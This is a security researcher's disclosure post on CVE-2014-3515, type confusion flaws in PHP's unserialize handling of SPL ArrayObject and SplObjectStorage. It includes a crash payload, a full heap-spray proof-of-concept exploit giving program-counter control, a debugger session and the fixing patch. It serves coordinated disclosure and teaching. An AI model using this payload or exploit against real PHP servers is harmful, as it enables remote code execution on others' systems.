SPL ArrayObject/SPLObjectStorage Unserialization Type Confusion Vulnerabilities

Posted by Stefan Esser



One month ago the PHP developers released security updates for PHP 5.4 and PHP 5.5 that fixed a number of vulnerabilities. A few of these were discovered by us, and we already disclosed the less serious one in our previous blog post, phpinfo() Type Confusion Infoleak Vulnerability and SSL Private Keys, where we showed that the vulnerability allowed retrieving the SSL private key from Apache memory. However, we kept silent about two more serious type confusion vulnerabilities reachable through PHP's unserialize() function until the PHP team had the chance not only to fix PHP 5.4 and PHP 5.5 but also to ship a final PHP 5.3 release that fixes them. Unlike the previously disclosed information leak, these type confusions can lead to arbitrary remote code execution.

The PHP function unserialize() deserializes PHP variables that were previously serialized into a string representation by the serialize() function. Because of this, PHP application developers have traditionally used it to transfer data between PHP applications on different servers, or as a compact format for storing data on the client side, despite all warnings that this is potentially dangerous. The dangers arising from this function are twofold. On the one hand, it allows instantiating any class that PHP knows about at the time of execution, which can sometimes be abused to execute arbitrary code, as demonstrated in our research Utilizing Code Reuse Or Return Oriented Programming In PHP Application Exploits presented at BlackHat USA 2010. On the other hand, there is the danger of memory corruption, type confusion or use-after-free vulnerabilities in the unserialize() function itself. The researchers of SektionEins have shown the existence of both types of problems again and again in the past.

During the source code audits we perform for our customers, we still see unserialize() being used on user input today, despite all the previous vulnerabilities in unserialize() and various examples of successful compromises through object injection. Research from other teams has even shown that the encryption and signing schemes people think up to protect serialized data often do not work and can be exploited.

In this post we detail two type confusion vulnerabilities in the deserialization of SPL ArrayObject and SplObjectStorage objects that we disclosed to PHP.net, and we show how they allow attackers to execute arbitrary code on the server. Both vulnerabilities have been assigned the same CVE name, CVE-2014-3515.

The Vulnerabilities

The vulnerabilities in question are located in the PHP source code, in SPL_METHOD(Array, unserialize) inside the file /ext/spl/spl_array.c and in SPL_METHOD(SplObjectStorage, unserialize) inside the file /ext/spl/spl_observer.c. Both are in the handling of serialized object member variables.

if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) {
  goto outexcept;
}

/* copy members */
if (!intern->std.properties) {
  rebuild_object_properties(&intern->std);
}
zend_hash_copy(intern->std.properties, Z_ARRVAL_P(pmembers), (copy_ctor_func_t) zval_add_ref, (void *) NULL, sizeof(zval *));

The code above calls the deserializer to get the member variables from the serialized string and then copies them into the properties with the zend_hash_copy() function. The type confusion vulnerability here is that the code assumes that the deserialization returns a PHP array. This is however not checked and fully depends on the content of the serialized string. The result is then used via the Z_ARRVAL_P macro which leads to various problems depending on what type of variable is actually returned by the deserializer.

To understand the problem in more detail let us look at the definition of a ZVAL (ignoring the GC version) and the Z_ARRVAL_P macro:

typedef union _zvalue_value {
   long lval;                                 /* long value */
   double dval;                               /* double value */
   struct {
      char *val;
      int len;
   } str;
   HashTable *ht;                             /* hash table value */
   zend_object_value obj;
} zvalue_value;

struct _zval_struct {
   /* Variable information */
   zvalue_value value;                /* value */
   zend_uint refcount__gc;
   zend_uchar type;   /* active type */
   zend_uchar is_ref__gc;
};

#define Z_ARRVAL(zval)        (zval).value.ht
#define Z_ARRVAL_P(zval_p)    Z_ARRVAL(*zval_p)

As you can see from these definitions, accessing the Z_ARRVAL of a PHP variable looks up the pointer to the HashTable structure in the union zvalue_value. The HashTable structure is PHP's internal way of storing array data. Because the union is shared with the other variable types, the same memory holds different kinds of data depending on the type. A PHP integer variable, for example, has its value stored in the same position as the HashTable pointer of a PHP array variable (in case sizeof(long) == sizeof(void *)). The same is true for the value of floating point variables and the other variable types.

Let's look at what happens when the deserializer returns an integer (or maybe a double value for Win64): the value of the integer is used as an in-memory pointer to a HashTable, and that table's data is copied over into another array. The following little POC code demonstrates this and makes the deserializer attempt to work on a HashTable starting at memory address 0x55555555. This should result in a crash, because that is usually an invalid memory position.

   unserialize('C:11:"ArrayObject":28:{x:i:0;a:0:{};m:i:1431655765;}');


In case the memory address does point to a real HashTable structure, its content is copied over into the deserialized array object as its member variables. This is useful in case the result of the deserialization is serialized again and returned to the user, which is a common pattern in applications exposing unserialize() to user input. The following PHP code is an example of this pattern.

   $data = unserialize(base64_decode($_COOKIE['data']));
   setcookie("data", base64_encode(serialize($data)));

Whenever unserialize() is used in a similar way as above, vulnerabilities exposed through unserialize() can result in information leaks.

Digging Deeper

While integer variables allow us to interpret arbitrary memory positions as a HashTable, PHP's string variable type might be more interesting for an attacker. When you look at the ZVAL structure above, you will realize that the array's HashTable pointer is in the same position as a string's data pointer. This means that if the deserializer returns a string instead of an array, the content of the string is accessed as if it were a HashTable. Let's have a look at what these HashTable structures are.

typedef struct _hashtable {
  uint nTableSize;          /* current size of bucket space (power of 2) */
  uint nTableMask;          /* nTableSize - 1 for faster calculation */
  uint nNumOfElements;      /* current number of elements */
  ulong nNextFreeElement;   /* next free numerical index */
  Bucket *pInternalPointer; /* used for element traversal */
  Bucket *pListHead;        /* head of double linked list of all elements in array */
  Bucket *pListTail;        /* tail of double linked list of all elements in array */
  Bucket **arBuckets;       /* hashtable bucket space */
  dtor_func_t pDestructor;  /* element destructor */
  zend_bool persistent;     /* marks hashtable lifetime as persistent */
  unsigned char nApplyCount;  /* required to stop endless recursions */
  zend_bool bApplyProtection; /* required to stop endless recursions */
} HashTable;

PHP's HashTable structure is a mixture of two data structures: a hash table and a doubly linked list. This allows for fast element access but also makes it possible to traverse the elements of an array in order. The elements of the array are stored in so-called Buckets that either inline the data or provide a pointer to the actual data associated with a bucket. For every possible hash value, the topmost bucket is addressed through a pointer from the bucket space. The bucket data structure is as follows:

typedef struct bucket {
  ulong h;          /* Used for numeric indexing */
  uint nKeyLength;  /* 0 for numeric indicies, otherwise length of string */
  void *pData;      /* address of the data */
  void *pDataPtr;   /* storage place for data if datasize == sizeof(void *) */
  struct bucket *pListNext;  /* next pointer in global linked list */
  struct bucket *pListLast;  /* prev pointer in global linked list */
  struct bucket *pNext;      /* next pointer in bucket linked list */
  struct bucket *pLast;      /* prev pointer in bucket linked list */
  char arKey[1]; /* Must be last element - recently changed to point to external array key */
} Bucket;

With those two data structures it is now possible to lay out a fake HashTable in the string that is passed to unserialize(), which itself points to a fake array in memory. Depending on the content of that fake array, the destruction of the just-deserialized object at the end of the script will trigger the HashTable destructor that the attacker supplied in the fake array, which gives the attacker control over the program counter. The first parameter to this destructor is a pointer to the pointer to the fake ZVAL supplied by the fake Bucket, which means a pivot gadget that moves the first function parameter into the stack pointer would be enough to start a ROP chain.

Proof of Concept Exploit

The following code was shared with the PHP developers on 20th June 2014. It is a POC that demonstrates program counter control from a PHP script. The POC was developed against a standard Mac OS X 10.9.3 installation of PHP 5.4.24. It works by first spraying the heap with a repeated pattern of fake hashtables, buckets and zvals and then triggering the malicious unserialize(). Keep in mind that a remote attacker could heap spray PHP installations by sending lots of POST data to the server and then passing a malicious string to an unserialize() call that is exposed to user input.

<?php
/* Unserialize ArrayObject Type Confusion Exploit */
/* (C) Copyright 2014 Stefan Esser */

ini_set("memory_limit", -1);

if ($_SERVER['argc'] < 2) {
  $__PC__ = 0x504850111110;
} else {
  $__PC__ = $_SERVER['argv'][1] + 0;
}

// we assume that 0x111000000 is controlled by our heap spray
$base = 0x114000000 + 0x20;

echo "Setting up memory...\n";
setup_memory();

echo "Now performing exploit...\n";
$inner = 'x:i:0;a:0:{};m:s:'.strlen($hashtable).':"'.$hashtable.'";';
$exploit = 'C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}';
$z = unserialize($exploit);

function setup_memory()
{
  global $str, $hashtable, $base, $__PC__;

  $bucket_addr = $base;
  $zval_delta = 0x100;
  $hashtable_delta = 0x200;
  $zval_addr = $base + $zval_delta;
  $hashtable_addr = $base + $hashtable_delta;

  //typedef struct bucket {
  $bucket  = "\x01\x00\x00\x00\x00\x00\x00\x00"; //   ulong h;
  $bucket .= "\x00\x00\x00\x00\x00\x00\x00\x00"; //   uint nKeyLength = 0 => numerical index
  $bucket .= ptr2str($bucket_addr + 3*8);//   void *pData;
  $bucket .= ptr2str($zval_addr); //  void *pDataPtr;
  $bucket .= ptr2str(0);//    struct bucket *pListNext;
  $bucket .= ptr2str(0);//    struct bucket *pListLast;
  $bucket .= ptr2str(0);//    struct bucket *pNext;
  $bucket .= ptr2str(0);//    struct bucket *pLast;
  $bucket .= ptr2str(0);//    const char *arKey;
  //} Bucket;

  //typedef struct _hashtable {
  $hashtable  = "\x00\x00\x00\x00";// uint nTableSize;
  $hashtable .= "\x00\x00\x00\x00";// uint nTableMask;
  $hashtable .= "\x01\x00\x00\x00";// uint nNumOfElements;
  $hashtable .= "\x00\x00\x00\x00";// alignment padding
  $hashtable .= "\x00\x00\x00\x00\x00\x00\x00\x00";// ulong nNextFreeElement;
  $hashtable .= ptr2str(0);// Bucket *pInternalPointer;       /* Used for element traversal */
  $hashtable .= ptr2str($bucket_addr);//      Bucket *pListHead;
  $hashtable .= ptr2str(0);// Bucket *pListTail;
  $hashtable .= ptr2str(0);// Bucket **arBuckets;
  $hashtable .= ptr2str($__PC__);//   dtor_func_t pDestructor;
  $hashtable .= "\x00";//     zend_bool persistent;
  $hashtable .= "\x00";//     unsigned char nApplyCount;
  //  zend_bool bApplyProtection;
  //} HashTable;

  //typedef union _zvalue_value {
  //  long lval;                                      /* long value */
  //  double dval;                            /* double value */
  //  struct {
  //          char *val;
  //          int len;
  //  } str;
  //  HashTable *ht;                          /* hash table value */
  //  zend_object_value obj;
  //} zvalue_value;

  //struct _zval_struct {
  /* Variable information */
  $zval = ptr2str($hashtable_addr);// zvalue_value value;             /* value */
  $zval .= ptr2str(0);
  $zval .= "\x00\x00\x00\x00";//      zend_uint refcount__gc;
  $zval .= "\x04";//  zend_uchar type;        /* active type */
  $zval .= "\x00";//  zend_uchar is_ref__gc;
  $zval .= ptr2str(0);
  $zval .= ptr2str(0);
  $zval .= ptr2str(0);
  //};

  /* Build the string */
  $part = str_repeat("\x73", 4096);
  for ($j=0; $j<strlen($bucket); $j++) {
    $part[$j] = $bucket[$j];
  }
  for ($j=0; $j<strlen($hashtable); $j++) {
    $part[$j+$hashtable_delta] = $hashtable[$j];
  }
  for ($j=0; $j<strlen($zval); $j++) {
    $part[$j+$zval_delta] = $zval[$j];
  }
  $str = str_repeat($part, 1024*1024*256/4096);
}

function ptr2str($ptr)
{
  $out = "";
  for ($i=0; $i<8; $i++) {
    $out .= chr($ptr & 0xff);
    $ptr >>= 8;
  }
  return $out;
}


You can then test the POC on the command line:

$ lldb php
Current executable set to 'php' (x86_64).

(lldb) run exploit.php 0x1122334455
There is a running process, kill it and restart?: [Y/n] y
Process 38336 exited with status = 9 (0x00000009)
Process 38348 launched: '/usr/bin/php' (x86_64)
Setting up memory...
Now performing exploit...
Process 38348 stopped
* thread #1: tid = 0x636867, 0x0000001122334455, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x1122334455)
    frame #0: 0x0000001122334455
error: memory read failed for 0x1122334400
(lldb) re re
General Purpose Registers:
     rax = 0x0000001122334455
     rbx = 0x0000000114000020
     rcx = 0x000000010030fd48  php`_zval_dtor_func + 160
     rdx = 0x0000000100d22050
     rdi = 0x0000000114000038
     rsi = 0x0000000000000000
     rbp = 0x00007fff5fbfe8b0
     rsp = 0x00007fff5fbfe888
      r8 = 0x0000000000000000
      r9 = 0x0000000000000008
     r10 = 0x0000000000000000
     r11 = 0x000000000000005b
     r12 = 0x0000000100956be8  php`executor_globals
     r13 = 0x0000000000000000
     r14 = 0x0000000114000220
     r15 = 0x0000000000000000
     rip = 0x0000001122334455  <----- controlled RIP
  rflags = 0x0000000000010206
      cs = 0x000000000000002b
      fs = 0x0000000000000000
      gs = 0x0000000022330000

(lldb) x/20x $rdi-0x18
0x114000020: 0x00000001 0x00000000 0x00000000 0x00000000
0x114000030: 0x14000038 0x00000001 0x14000120 0x00000001 <---- &pDataPtr
0x114000040: 0x00000000 0x00000000 0x00000000 0x00000000
0x114000050: 0x00000000 0x00000000 0x00000000 0x00000000
0x114000060: 0x00000000 0x00000000 0x73737373 0x73737373

The Fix

We shared our patches for these vulnerabilities with the PHP developers, who have since released PHP 5.5.14, PHP 5.4.30 and PHP 5.3.29. If you are running any of these versions, you do not need to apply the fix. If you are not, you should make sure that you apply the following patchset.

--- php-5.5.13/ext/spl/spl_observer.c 2014-05-28 11:06:28.000000000 +0200
+++ php-5.5.13-unserialize-fixed/ext/spl/spl_observer.c       2014-06-20 17:54:33.000000000 +0200
@@ -898,7 +898,7 @@

-     if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+     if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(pmembers) != IS_ARRAY) {
              goto outexcept;
--- php-5.5.13/ext/spl/spl_array.c    2014-05-28 11:06:28.000000000 +0200
+++ php-5.5.13-unserialize-fixed/ext/spl/spl_array.c  2014-06-20 17:54:09.000000000 +0200
@@ -1789,7 +1789,7 @@

-     if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC)) {
+     if (!php_var_unserialize(&pmembers, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(pmembers) != IS_ARRAY) {
              goto outexcept;

Stefan Esser